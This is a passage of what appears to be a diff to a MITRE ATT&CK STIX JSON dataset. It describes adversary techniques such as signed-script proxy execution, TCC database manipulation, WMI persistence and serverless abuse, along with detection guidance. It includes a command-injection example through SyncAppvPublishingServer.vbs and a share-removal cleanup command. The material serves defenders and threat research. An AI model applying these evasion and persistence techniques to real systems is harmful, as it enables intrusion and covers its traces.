"https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "t1105_lolbas", + "description": "LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.", + "url": "https://lolbas-project.github.io/#t1105" + }, + { + "source_name": "PTSecurity Cobalt Dec 2016", + "description": "Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.", + "url": "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:12.723Z", + "name": "Commonly Used Port", + "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below. \n \n * TCP:80 (HTTP) \n * TCP:443 (HTTPS) \n * TCP/UDP:53 (DNS) \n * TCP:1024-4999 (OPC on XP/Win2k3) \n * TCP:49152-65535 (OPC on Vista and later) \n * TCP:23 (TELNET) \n * UDP:161 (SNMP) \n * TCP:502 (MODBUS) \n * TCP:102 (S7comm/ISO-TSAP) \n * TCP:20000 (DNP3) \n * TCP:44818 (Ethernet/IP)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0885", + "external_id": "T0885" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-18T23:51:40.464Z", + "name": "SyncAppvPublishingServer", + "description": "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)\n \nThe SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)\n\nAdversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by \"living off the land.\"(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)\n\nFor example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv)\n\n`SyncAppvPublishingServer.vbs \"n; {PowerShell}\"`", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Shaul Vilkomir-Preisman" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", + "created": "2024-02-06T16:20:41.647Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1216/002", + "external_id": "T1216.002" + }, + { + "source_name": "4 - appv", + "description": "John Fokker. (2022, March 17). Suspected DarkHotel APT activity update. Retrieved February 6, 2024.", + "url": "https://www.trellix.com/en-ca/about/newsroom/stories/research/suspected-darkhotel-apt-activity-update/" + }, + { + "source_name": "2 - appv", + "description": "Microsoft. (2022, November 3). Getting started with App-V for Windows client. Retrieved February 6, 2024.", + "url": "https://learn.microsoft.com/en-us/windows/application-management/app-v/appv-getting-started" + }, + { + "source_name": "5 - appv", + "description": "Nick Landers, Casey Smith. (n.d.). /Syncappvpublishingserver.vbs. Retrieved February 6, 2024.", + "url": "https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/" + }, + { + "source_name": "7 - appv", + "description": "Nick Landers. (2017, August 8). Need a signed alternative to Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered.. Retrieved February 6, 2024.", + "url": "https://twitter.com/monoxgas/status/895045566090010624" + }, + { + "source_name": "3 - appv", + "description": "Raj Chandel. (2022, March 17). Indirect Command Execution: Defense Evasion (T1202). Retrieved February 6, 2024.", + "url": "https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/" + }, + { + "source_name": "1 - appv", + "description": "SEONGSU PARK. (2022, December 27). BlueNoroff introduces new methods bypassing MoTW. Retrieved February 6, 2024.", + "url": "https://securelist.com/bluenoroff-methods-bypass-motw/108383/" + }, + { + "source_name": "6 - appv", + "description": "Strontic. (n.d.). SyncAppvPublishingServer.exe. Retrieved February 6, 2024.", + "url": "https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:12.926Z", + "name": "Project File Infection", + "description": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev) \n\nAdversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. (Citation: PLCdev)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0873", + "external_id": "T0873" + }, + { + "source_name": "Beckhoff", + "description": "Beckhoff TwinCAT 3 Source Control: Project Files Retrieved. 2019/11/21 ", + "url": "https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "PLCdev", + "description": "PLCdev Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 Siemens SIMATIC Step 7 Programmer's Handbook Retrieved. 2019/11/21 ", + "url": "http://www.plcdev.com/book/export/html/373" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-03T15:46:06.706Z", + "name": "Additional Email Delegate Permissions", + "description": "Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. \n\nFor example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) \n\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Mandiant Defend UNC2452 White Paper)\n\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Microsoft Detection and Response Team (DART)", + "Mike Burns, Mandiant", + "Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)", + "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)", + "Arad Inbar, Fidelis Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365", + "Google Workspace" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", + "created": "2020-01-19T16:54:28.516Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1098/002", + "external_id": "T1098.002" + }, + { + "source_name": "Bienstock, D. - Defending O365 - 2019", + "description": "Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.", + "url": "https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365" + }, + { + "source_name": "Crowdstrike Hiding in Plain Sight 2018", + "description": "Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020.", + "url": "https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/" + }, + { + "source_name": "Google Ensuring Your Information is Safe", + "description": "Google. (2011, June 1). Ensuring your information is safe online. Retrieved April 1, 2022.", + "url": "https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html" + }, + { + "source_name": "Gmail Delegation", + "description": "Google. (n.d.). Turn Gmail delegation on or off. Retrieved April 1, 2022.", + "url": "https://support.google.com/a/answer/7223765?hl=en" + }, + { + "source_name": "FireEye APT35 2018", + "description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.", + "url": "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf" + }, + { + "source_name": "Mandiant Defend UNC2452 White Paper", + "description": "Mandiant. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved January 22, 2021.", + "url": "https://www.mandiant.com/resources/blog/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452" + }, + { + "source_name": "Microsoft - Add-MailboxPermission", + "description": "Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Code Signing Certificates", + "description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", + "created": "2020-10-01T02:11:47.237Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1588/003", + "external_id": "T1588.003" + }, + { + "source_name": "Wikipedia Code Signing", + "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", + "url": "https://en.wikipedia.org/wiki/Code_signing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Network Share Connection Removal", + "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. (Citation: Technet Net Use)\n\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "x_mitre_system_requirements": [ + "Established network share connection to a remote system. Level of access depends on permissions of the account used." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e7eab98d-ae11-4491-bd28-a53ba875865a", + "created": "2017-05-31T21:31:38.350Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1126", + "external_id": "T1126" + }, + { + "source_name": "Technet Net Use", + "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.", + "url": "https://technet.microsoft.com/bb490717.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-05T16:13:38.643Z", + "name": "Serverless Execution", + "description": "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. \n\nAdversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)\n\nServerless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Shailesh Tiwary (Indian Army)", + "Praetorian", + "Oleg Kolesnikov, Securonix", + "Cisco", + "Varonis Threat Labs", + "Alex Soler, AttackIQ", + "Vectra AI" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "SaaS", + "IaaS", + "Office 365" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e848506b-8484-4410-8017-3d235a52f5b3", + "created": "2022-05-27T13:19:51.112Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1648", + "external_id": "T1648" + }, + { + "source_name": "Microsoft DART Case Report 001", + "description": "Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.", + "url": "https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team" + }, + { + "source_name": "Backdooring an AWS account", + "description": "Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.", + "url": "https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9" + }, + { + "source_name": "Varonis Power Automate Data Exfiltration", + "description": "Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.", + "url": "https://www.varonis.com/blog/power-automate-data-exfiltration" + }, + { + "source_name": "Cado Security Denonia", + "description": "Matt Muir. (2022, April 6). Cado Discovers Denonia: The First Malware Specifically Targeting Lambda. Retrieved May 27, 2022.", + "url": "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/" + }, + { + "source_name": "Rhino Security Labs AWS Privilege Escalation", + "description": "Rhino Security Labs. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.", + "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/" + }, + { + "source_name": "Rhingo Security Labs GCP Privilege Escalation", + "description": "Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved May 27, 2022.", + "url": "https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-17T00:02:12.021Z", + "name": "TCC Manipulation", + "description": "Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to execute malicious applications with elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).\n\nWhen an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise abuse the TCC service to execute malicious content. This can be done in various ways, including using privileged system applications to execute malicious payloads or manipulating the database to grant their application TCC permissions. \n\nFor example, adversaries can use Finder, which has FDA permissions by default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) while preventing a user prompt. For a system without System Integrity Protection (SIP) enabled, adversaries have also manipulated the operating system to load an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055)) into targeted applications with the desired TCC permissions.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Marina Liang" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb", + "created": "2024-03-21T21:10:57.322Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/006", + "external_id": "T1548.006" + }, + { + "source_name": "welivesecurity TCC", + "description": "Marc-Etienne M.Léveillé. (2022, July 19). I see what you did there: A look at the CloudMensis macOS spyware. Retrieved March 21, 2024.", + "url": "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/" + }, + { + "source_name": "TCC Database", + "description": "Marina Liang. (2024, April 23). Return of the mac(OS): Transparency, Consent, and Control (TCC) Database Manipulation. Retrieved March 28, 2024.", + "url": "https://interpressecurity.com/resources/return-of-the-macos-tcc/" + }, + { + "source_name": "TCC macOS bypass", + "description": "Phil Stokes. (2021, July 1). Bypassing macOS TCC User Privacy Protections By Accident and Design. Retrieved March 21, 2024.", + "url": "https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Windows Management Instrumentation Event Subscription", + "description": "Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e906ae4d-1d3a-4675-be23-22f7311c0da4", + "created": "2017-05-31T21:31:05.140Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1084", + "external_id": "T1084" + }, + { + "source_name": "Dell WMI Persistence", + "description": "Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.", + "url": "https://www.secureworks.com/blog/wmi-persistence" + }, + { + "source_name": "Kazanciyan 2014", + "description": "Kazanciyan, R. & Hastings, M. (2014). Defcon 22 Presentation. Investigating PowerShell Attacks [slides]. Retrieved November 3, 2014.", + "url": "https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf" + }, + { + "source_name": "Mandiant M-Trends 2015", + "description": "Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.", + "url": "https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "Medium Detecting WMI Persistence", + "description": "French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Launch Daemon", + "description": "Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and 